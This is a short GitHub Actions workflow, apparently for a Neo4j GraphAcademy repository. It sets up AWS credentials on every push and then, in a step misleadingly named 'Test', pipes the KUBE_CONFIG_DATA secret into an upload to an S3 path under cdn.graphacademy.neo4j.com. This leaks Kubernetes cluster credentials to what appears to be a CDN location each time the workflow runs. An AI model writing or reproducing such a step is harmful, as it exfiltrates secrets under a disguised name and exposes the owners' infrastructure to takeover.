name: Release

on:
  push:

jobs:
  assets:
    runs-on: ubuntu-latest

    steps:
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-access-key-id: ${{ secrets.GA_DEPLOY_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.GA_DEPLOY_SECRET_ACCESS_KEY }}
          aws-region: ${{ secrets.GA_AWS_REGION }}

      - name: Test
        run: |
          echo "${{ secrets.KUBE_CONFIG_DATA }}" | aws s3 cp - s3://cdn.graphacademy.neo4j.com/kubeconfig.data
